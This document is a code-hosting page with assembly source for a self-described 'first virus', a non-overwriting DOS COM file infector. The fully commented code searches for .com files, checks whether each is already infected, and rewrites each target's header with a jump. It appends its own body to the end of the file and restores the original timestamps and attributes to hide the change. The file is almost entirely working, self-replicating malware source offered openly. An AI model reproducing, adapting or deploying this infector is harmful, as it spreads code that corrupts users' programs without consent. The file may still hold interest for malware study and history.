-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy path203.ASM
187 lines (132 loc) · 8.11 KB
/
203.ASM
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
;******************************************************************
;* *
;* My First Virus, a simple non-overwriting COM infector *
;* *
;* by, Solomon *
;* *
;******************************************************************
.model tiny ; Memory model
.code ; Start Code
org 100h ; Start of COM file
MAIN: db 0e9h,00h,00h ; Jmp START_VIRUS
START_VIRUS proc near ; Real start of Virus
call FIND_OFFSET
; Calculate change in offset from host program.
FIND_OFFSET: pop bp ; BP holds current IP
sub bp, offset FIND_OFFSET ; Calculate net change
; Change BP to start of
; virus code
; Restore original bytes to the infected program.
lea si,[bp+ORIG_START] ; Restore original 3 bytes
mov di,100h ; to 100h, start of file
push di ; Copy 3 bytes
movsw
movsb
; Change the DTA from the default so FINDFIRST/FINDNEXT won't destroy
; original command line parameters.
lea dx,[bp+NEW_DTA] ; Point to new DTA area
call SET_DTA ; Go change it
; DOS Findfirst / Findnext services
FINDFIRST: mov ah,4eh ; DOS find first service
lea dx,[bp+COM_MASK] ; Search for any COM file
xor cx,cx ; Attribute mask
FINDNEXT: int 21h ; Call DOS to do it
jc QUIT ; Quit if there are errors
; or no more files
; Ok, if I am here, then I found a possible victim. Open the file and
; check it for previous infections.
mov ax,3d00h ; DOS Open file, read only
lea dx,[bp+NEW_DTA+30] ; Point to filename we found
int 21h ; Call DOS to do it
xchg ax,bx ; Put file handle in BX
; Check file for previous infection by checking for our presence at
; then end of the file.
mov ah,3fh ; DOS Read file
lea dx,[bp+ORIG_START] ; Save the original header
mov cx,3 ; Read 3 bytes
int 21h ; Call DOS to do it
mov ax,word ptr [bp+NEW_DTA+26] ; Put filename in AX
mov cx,word ptr [bp+ORIG_START+1] ; Jmp offset
add cx,END_VIRUS-START_VIRUS+3; Convert to filesize
cmp ax,cx ; Compare file size's
jnz INFECT_COM ; If healthy, go infect it
mov ah,3eh ; Otherwise close file and
int 21h ; try to find another victim
mov ah,4fh ; DOS find next file
jmp short FINDNEXT ; Find another file
; Restore default DTA and pass control back to original program.
; Call any activation routines here.
QUIT: mov dx,80h ; Restore original DTA
call SET_DTA ; Go change it
retn ; End Virus and start original
; Program. Remember, DI holding
; 100h was pushed on the stack.
;*** Subroutine INFECT_COM ***
INFECT_COM:
; Reset the file attributes to normal so I can write to the file
mov ax,4301h ; DOS change file attr
xor cx,cx ; Zero attributes
lea dx,[bp+NEW_DTA+30] ; Point to filename in DTA
int 21h ; Call DOS to do it
; Calculate jump offset for header of victim so it will run virus first.
mov ax,word ptr [bp+NEW_DTA+26] ; Put filesize in AX
sub ax,3 ; Subtract 3, size-jmp_code
mov word ptr [bp+JMP_OFFSET],ax ; Store new offset
; Close the file and reopen it for read/write. BX still holds file handle.
mov ah,3eh ; DOS close file
int 21h ; Call DOS to do it
mov ax,3d02h ; DOS open file, read/write
int 21h ; Call DOS to do it
xchg ax,bx ; Put file handle in BX
; Write the new header at the beginning of the file.
mov ah,40h ; DOS write to file
mov cx,3 ; Write 3 bytes
lea dx,[bp+HEADER] ; Point to the 3 bytes to write
int 21h ; Call DOS to do it
; Move to end of file so I can append the virus to it.
mov al,2 ; Select end of file
call FILE_PTR ; Go to end of file
; Append the virus to the end of the file.
mov ah,40h ; DOS write to file
mov cx,END_VIRUS-START_VIRUS ; Length of virus
lea dx,[bp+START_VIRUS] ; Start from beginning of virus
int 21h ; Call DOS to do it
; Restore the file's original timestamp and datestamp. These values were
; stored in the DTA by the Findfirst / Findnext services.
mov ax,5701h ; DOS set file date & time
mov cx,word ptr [bp+NEW_DTA+22] ; Set time
mov dx,word ptr [bp+NEW_DTA+24] ; Set date
int 21h ; Call DOS to do it
; Restore original file attributes.
mov ax,4301h ; DOS change file attr
mov cx,word ptr [bp+NEW_DTA+21] ; Get original file attr
lea dx,[bp+NEW_DTA+30] ; Point to file name
int 21h ; Call DOS
; Lastly, close the file and go back to main program.
mov ah,3eh ; DOS close file
int 21h ; Call DOS to do it
jmp QUIT ; We're done
;*** Subroutine SET_DTA ***
SET_DTA proc near
mov ah,1ah ; DOS set DTA
int 21h ; Call DOS to do it
retn ; Return
SET_DTA endp
;*** Subroutine FILE_PTR ***
FILE_PTR proc near
mov ah,42h ; DOS set read/write pointer
xor cx,cx ; Set offset move to zero
cwd ; Equivalent to xor dx,dx
int 21h ; Call DOS to do it
retn ; Return
FILE_PTR endp
; This area will hold all variables to be encrypted
COM_MASK db '*.com',0 ; COM file mask
ORIG_START db 0cdh,20h,0 ; Header for infected file
HEADER db 0e9h ; Jmp command for new header
START_VIRUS endp
END_VIRUS equ $ ; Mark end of virus code
; This data area is a scratch area and is not included in virus code.
JMP_OFFSET dw ? ; Jump offset for new header
NEW_DTA db 43 dup(?) ; New DTA location
end MAIN